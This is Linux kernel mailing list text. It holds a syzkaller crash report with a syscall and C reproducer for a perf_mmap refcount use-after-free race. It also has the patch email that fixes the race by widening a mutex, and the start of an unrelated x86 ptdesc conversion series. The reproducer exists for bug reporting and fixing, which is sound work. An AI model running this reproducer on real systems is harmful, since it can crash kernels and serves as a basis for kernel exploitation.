0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
From: Haocheng Yu <yuhaocheng035@gmail.com>

Syzkaller reported a "refcount_t: addition on 0; use-after-free"
warning in perf_mmap. The issue is caused by a race condition between a
failing mmap() setup and a concurrent mmap() on a dependent event
(e.g., using output redirection).

In perf_mmap(), the ring_buffer (rb) is allocated and assigned to
event->rb with the mmap_mutex held. The mutex is then released to
perform map_range(). If map_range() fails, perf_mmap_close() is called
to clean up. However, since the mutex was dropped, another thread
attaching to this event (via inherited events or output redirection)
can acquire the mutex, observe the valid event->rb pointer, and attempt
to increment its reference count. If the cleanup path has already
dropped the reference count to zero, this results in a use-after-free
or a refcount saturation warning.

Fix this by extending the scope of mmap_mutex to cover the map_range()
call. This ensures that ring buffer initialization and mapping (or
cleanup on failure) happen atomically, effectively preventing other
threads from accessing a half-initialized or dying ring buffer.

Reported-by: kernel test robot <lkp@intel.com>
Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/
Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 38 +++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..abefd1213582 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
 
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
+	/*
+	 * Since pinned accounting is per vm we cannot allow fork() to copy our
+	 * vma.
+	 */
+	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+	vma->vm_ops = &perf_mmap_vmops;
 
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
+	mapped = get_mapped(event, event_mapped);
+	if (mapped)
+		mapped(event, vma->vm_mm);
 
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+	/*
+	 * Try to map it into the page table. On fail, invoke
+	 * perf_mmap_close() to undo the above, as the callsite expects
+	 * full cleanup in this case and therefore does not invoke
+	 * vmops::close().
+	 */
+	ret = map_range(event->rb, vma);
+	if (ret)
+		perf_mmap_close(vma);
+	}
 
 	return ret;
 }

base-commit: 7d0a66e4bb9081d75c82ec4957c50034cb0ea449
-- 
2.51.0
{ "author": "yuhaocheng035@gmail.com", "date": "Tue, 3 Feb 2026 00:20:56 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH v3 0/3] Convert 64-bit x86/mm/pat to ptdescs
x86/mm/pat should be using ptdescs. One line has already been
converted to pagetable_free(), while the allocation sites still use
raw page allocator calls. This causes issues when separately
allocating ptdescs from struct page. These patches convert the
allocation/free sites to use ptdescs.

In the short term, this helps enable Matthew's work to allocate frozen
pagetables[1]. And in the long term, this will help us cleanly split
ptdesc allocations from struct page.

The pgd_list should also be using ptdescs (for 32-bit in this file).
This can be done in a different patchset since there are other users
of pgd_list that still need to be converted.

[1] https://lore.kernel.org/linux-mm/20251113140448.1814860-1-willy@infradead.org/
[2] https://lore.kernel.org/linux-mm/20251020001652.2116669-1-willy@infradead.org/

------

I've also tested this on a tree that separately allocates ptdescs.
That didn't find any lingering alloc/free issues.

Based on current mm-new.

v3:
- Move comment regarding 32-bit conversions into the cover letter
- Correct the handling for the pagetable_alloc() error path

Vishal Moola (Oracle) (3):
  x86/mm/pat: Convert pte code to use ptdescs
  x86/mm/pat: Convert pmd code to use ptdescs
  x86/mm/pat: Convert split_large_page() to use ptdescs

 arch/x86/mm/pat/set_memory.c | 56 +++++++++++++++++++++---------------
 1 file changed, 33 insertions(+), 23 deletions(-)

--
2.52.0
In order to separately allocate ptdescs from pages, we need all
allocation and free sites to use the appropriate functions. Convert
these pte allocation/free sites to use ptdescs.

Signed-off-by: Vishal Moola (Oracle) <vishal.moola@gmail.com>
---
 arch/x86/mm/pat/set_memory.c | 15 +++++++++------
 1 file changed, 9 insertions(+), 6 deletions(-)

